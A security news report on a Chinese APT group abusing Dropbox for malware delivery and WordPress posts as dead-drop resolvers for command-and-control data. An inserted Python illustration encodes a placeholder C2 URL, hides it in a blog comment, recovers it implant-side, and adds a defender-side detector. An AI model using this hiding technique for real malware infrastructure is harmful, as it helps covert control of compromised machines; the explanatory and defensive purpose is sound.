Chinese hackers abuse major cloud-based platforms in all the phases of their attacks, a new report found.
The Chinese Advanced Persistent Threat (APT) group that targeted The New York Times last year used Dropbox and WordPress to carry out its missions, said researchers from Cyber Squared in a new report.
In the first phase of the attack, the APT group uploaded malicious files to a free Dropbox account and sent links to the binaries, via email, to the targets.
Dropbox gives the attackers anonymity and lets them hide their intent behind a trusted brand. It also means the malicious content is delivered from a domain most organizations allow, over a channel that traditional detection and mitigation systems do not inspect closely.
The file hosted on Dropbox appears to be a harmless document, for example a policy document from the Association of Southeast Asian Nations (ASEAN).
In reality, when the victim opens the document, it exploits a vulnerability in software installed on the targeted computer in order to drop malware. To avoid raising suspicion, a legitimate decoy document is displayed at the same time.
Once a computer is infected, the second phase of the attack starts: the malware connects to a WordPress blog and retrieves its command and control (C&C) information from there.
The C&C data hides in plain sight within news articles related to geopolitical events, a dead-drop resolver pattern in which the blog, not the attacker's own server, is the first thing the implant contacts.
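To make the dead-drop mechanism concrete, here is an added example (not code from the report or from the group it describes) of how a C2 endpoint can be parked inside an ordinary-looking blog article and pulled out by an implant, together with a simple defender-side check. The marker strings, the XOR key, the article text and the 203.0.113.7 endpoint are all constructed assumptions for illustration; the report does not state which encoding the group actually used.

```python
"""
Dead-drop resolver illustration (added example, not the APT's real encoding).

The visible article is a plausible geopolitics post. The C2 URL is XOR'd with a
short key, base64-encoded and parked in an HTML comment between two marker
strings, so the page renders normally while the implant can find it.
"""
import base64
import re
from typing import List, Optional

# Hypothetical markers and key; nothing here is taken from the report.
MARKER_START = "<!-- ref:"
MARKER_END = "-->"
XOR_KEY = b"asean2013"


def _xor(data: bytes) -> bytes:
    """Repeating-key XOR, used symmetrically for obfuscate and de-obfuscate."""
    return bytes(b ^ XOR_KEY[i % len(XOR_KEY)] for i, b in enumerate(data))


def encode_c2(c2_url: str) -> str:
    """Attacker side: obfuscate the C2 URL so it looks like an opaque token."""
    return base64.b64encode(_xor(c2_url.encode("utf-8"))).decode("ascii")


def embed_c2(article_html: str, c2_url: str) -> str:
    """Attacker side: hide the token in a comment after the first paragraph."""
    token = f"{MARKER_START}{encode_c2(c2_url)}{MARKER_END}"
    return article_html.replace("</p>", "</p>" + token, 1)


def resolve_c2(article_html: str) -> Optional[str]:
    """Implant side: fetch the post, locate the markers, recover the C2 URL."""
    pattern = re.escape(MARKER_START) + r"([A-Za-z0-9+/=]+)" + re.escape(MARKER_END)
    match = re.search(pattern, article_html)
    if match is None:
        return None
    return _xor(base64.b64decode(match.group(1))).decode("utf-8")


# Defender side: a blog page that a host keeps polling should not carry long
# base64-looking runs inside HTML comments. Crude, but it catches this pattern.
_B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def suspicious_comments(html: str) -> List[str]:
    """Return HTML comments that contain a base64-looking run of 16+ chars."""
    comments = re.findall(r"<!--(.*?)-->", html, re.S)
    return [c.strip() for c in comments if _B64_RUN.search(c)]


# Constructed sample article (not a real post).
ARTICLE = (
    "<h1>ASEAN ministers meet on maritime code of conduct</h1>\n"
    "<p>Foreign ministers gathered this week to discuss a draft code "
    "of conduct for the South China Sea.</p>\n"
    "<p>Observers expect talks to continue into next year.</p>\n"
)

if __name__ == "__main__":
    staged = embed_c2(ARTICLE, "https://203.0.113.7/update")
    print("implant resolves:", resolve_c2(staged))
    print("defender flags:", suspicious_comments(staged))
```

The implant never needs a hard-coded C2 address, which is the point of the technique: the operator can rotate infrastructure by editing a blog post, and the first network connection from the victim goes to a site with a clean reputation. The defender-side check is deliberately simple; in practice you would pair it with proxy-log correlation (a Dropbox download followed by periodic fetches of the same blog URL from the same host).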
“This serves as yet another example of how sophisticated threats are successfully leveraging trusted SPI to facilitate the initial targeting and C2 phases of their exploitation operations. Few enterprise net defense teams are adequately resourced or enabled to detect targeted attacks and subsequent C2 web sessions that use trusted SPI chaining techniques,” Cyber Squared said.